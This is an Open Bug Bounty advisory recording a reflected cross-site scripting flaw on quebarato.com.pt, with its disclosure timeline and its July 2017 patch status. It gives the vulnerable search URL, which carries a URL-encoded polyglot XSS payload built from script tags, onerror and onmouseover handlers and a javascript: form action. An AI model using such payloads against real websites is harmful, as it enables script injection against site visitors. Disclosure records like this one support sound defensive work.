quebarato.com.pt XSS vulnerability

2016-12-16T13:42:00
ID OBB:198205
Type openbugbounty
Reporter AndresERiveraB
Modified 2017-07-28T13:18:00

Description

Vulnerable URL:
http://www.quebarato.com.pt/search?q=%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm(%27openbugbounty%27)%3E%3C%2Fmarquee%3E%22%3E%3C%2Fplaintext\%3E%3C%2F|+\%3E%3Cplaintext%2Fonmouseover%3Dprompt(%27openbugbounty%27)%3E%3Cscript%3Eprompt(1)%3C%2Fscript%3E%40gmail.com%3Cisindex+formaction%3Djavascript%3Aalert(%2FXSS%2F)+type%3Dsubmit%3E%27--%3E%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(1)+%3C%2Fscript%3E%22%3E
Details:

Description| Value
---|---
Patched:| Yes, at 28.07.2017
Latest check for patch:| 28.07.2017 13:18 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1399514
VIP website status:| No
Check quebarato.com.pt SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 16 December, 2016 13:42 GMT
Generic security notifications sent to website owner| 16 December, 2016 13:44 GMT
Notification sent to subscribers (without technical details)| 16 December, 2016 14:17 GMT
Vulnerability details disclosed by researcher| 10 March, 2017 14:15 GMT
Vulnerability patched by the website owner| 28 July, 2017 13:18 GMT